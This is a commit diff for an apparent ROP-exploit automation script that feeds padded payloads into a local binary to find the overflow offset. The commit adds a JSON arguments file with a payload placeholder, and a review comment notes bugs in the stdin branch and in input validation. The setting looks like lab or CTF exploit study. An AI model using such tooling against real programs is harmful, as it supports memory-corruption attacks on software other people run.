pass exec args
This commit is contained in:
parent
7934330d2e
commit
055b787c2d
22
autoRop.py
22
autoRop.py
@ -43,6 +43,7 @@ arg_parser.add_argument("--max_payload", metavar="max", default=16384, type=int,
|
||||
arg_parser.add_argument("--input_method", metavar="method", choices=['arg', 'file', 'stdin'], default='arg', help="Method of passing the payload to the target binary")
|
||||
arg_parser.add_argument("--run", action="store_true", default=False, help="Automatically run the ROP on the executable")
|
||||
arg_parser.add_argument("--interactive", action="store_true", default=False, help="Automatically run the ROP on the executable")
|
||||
arg_parser.add_argument("--exec_args_file", metavar="exec_args_file", default="exec_args.json", type=str, help="The path to the file containing the arguments to pass to the executable. Put $PAYLOAD$ where you want the payload to be placed.")
|
||||
|
||||
args = arg_parser.parse_args()
|
||||
|
||||
@ -54,18 +55,27 @@ max_payload = args.max_payload
|
||||
run = args.run
|
||||
input_method = args.input_method
|
||||
interactive = args.interactive
|
||||
exec_args_file = args.exec_args_file
|
||||
|
||||
exec_args = []
|
||||
with open(exec_args_file, "r") as f:
|
||||
exec_args = json.load(f)
|
||||
|
||||
payload_idx = exec_args.index('$PAYLOAD$')
|
||||
|
||||
def run_program(payload: str, **kwargs) -> process:
|
||||
p = None
|
||||
if input_method == 'arg':
|
||||
p = process([f'./{exec_file}', payload], **kwargs)
|
||||
exec_args[payload_idx] = payload
|
||||
p = process([f'./{exec_file}'] + exec_args, **kwargs)
|
||||
elif input_method == 'file':
|
||||
with open('/tmp/input.txt', 'wb') as f:
|
||||
f.write(payload)
|
||||
f.flush()
|
||||
p = process([f'./{exec_file}', '/tmp/input.txt'], **kwargs)
|
||||
exec_args[payload_idx] = '/tmp/input.txt'
|
||||
p = process([f'./{exec_file}'] + exec_args, **kwargs)
|
||||
elif input_method == 'stdin':
|
||||
p = process([f'./{exec_file}'], **kwargs)
|
||||
p = process([f'./{exec_file}'] + exec_args, **kwargs)
|
||||
p.send(payload)
|
||||
|
||||
return p
|
||||
@ -90,10 +100,8 @@ def find_offset_inc(low: int, high: int):
|
||||
for i in range(low, high + 1):
|
||||
print(f" ├─[🤔] Trying offset {i}...")
|
||||
rop_payload = (b'A' * i) + original_payload
|
||||
proc = run_program(rop_payload, alarm=1)
|
||||
output = proc.readall()
|
||||
print(output)
|
||||
if b'[ Successful ROP! ]' in output:
|
||||
proc = run_program(rop_payload)
|
||||
if b'[ Successful ROP! ]' in proc.readall():
|
||||
print(f" └─[😳] Found offset at {i}!\n")
|
||||
return i
|
||||
|
||||
|
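Review bot: In the stdin branch, the new `p = process([f'./{exec_file}'] + exec_args, **kwargs)` passes the literal string `$PAYLOAD$` to the target, because the module-level `payload_idx = exec_args.index('$PAYLOAD$')` forces the marker to be present for every input method while only the arg and file branches replace it; dropping it there, `p = process([f'./{exec_file}'] + [a for a in exec_args if a != '$PAYLOAD$'], **kwargs)`, keeps the args file usable across all three methods. That same `.index` call fails with a bare ValueError when the JSON lacks the marker and with an AttributeError when the document is not a list, so a check right after `json.load` with an explicit message would make a misconfigured args file obvious: `if not isinstance(exec_args, list) or '$PAYLOAD$' not in exec_args:` / `    raise SystemExit(f"{exec_args_file} must be a JSON list containing '$PAYLOAD$'")`. The arg and file branches also mutate the shared `exec_args` list in place on every call; building a per-call copy (`argv = list(exec_args); argv[payload_idx] = payload`) would keep `run_program` free of module state. The hunk does not show an `import json`; if the top of the file does not already have one, it needs adding.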
1
exec_args.json
Normal file
1
exec_args.json
Normal file
@ -0,0 +1 @@
|
||||
[ "$PAYLOAD$" ]
|
Binary file not shown.